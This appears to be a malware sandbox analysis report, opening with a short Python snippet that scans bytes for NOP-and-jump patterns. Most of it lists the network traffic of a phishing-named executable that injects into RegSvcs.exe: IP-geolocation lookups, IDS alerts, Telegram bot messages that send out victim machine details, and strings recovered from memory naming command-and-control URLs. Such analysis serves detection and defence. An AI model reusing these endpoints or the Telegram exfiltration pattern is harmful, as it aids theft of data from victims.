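    jmp_at = len(buf)                                     # offset 10
    rel = 0x028DF8E9 - (BASE + jmp_at + 5)                # rel32 is relative to the next instruction
    buf += b"\xE9" + struct.pack("<i", rel)               # offset 10..14
    buf += b"\x90\x90\xEB\x02"                            # offset 15..18: 2 NOPs, short jmp
    buf += b"\x33\xc0"                                    # offset 19..20: xor eax,eax
    buf += b"\x90" * 5 + b"\xEB\x05"                      # offset 21..27: 5 NOPs, jmp +5
    buf += b"\x90" * 4 + b"\xc7\x45\xec\x00\x00\x00\x00"  # offset 28..38: 4 NOPs, mov [ebp-14h],0
    return bytes(buf)


if __name__ == "__main__":
    for off, count, target in find_nop_jmp(build_sample(), BASE):
        print(f"{count}x nop at {BASE + off:08X}h then jmp {target:08X}h")
```

The scan is deliberately byte-level, so a rel32 whose encoding happens to contain 0x90 can split a run; a disassembler-backed version would walk instruction boundaries instead, which is what the sandbox's own signature does in the cases it reports per function.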

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49756 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/03/2025%20/%2003:21:21%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:34:06%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49718 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49713 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49716 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.112.1:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49714 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49728 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_007B22EE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/03/2025%20/%2003:21:21%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:34:06%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 11 Mar 2025 08:05:25 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 11 Mar 2025 08:05:34 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
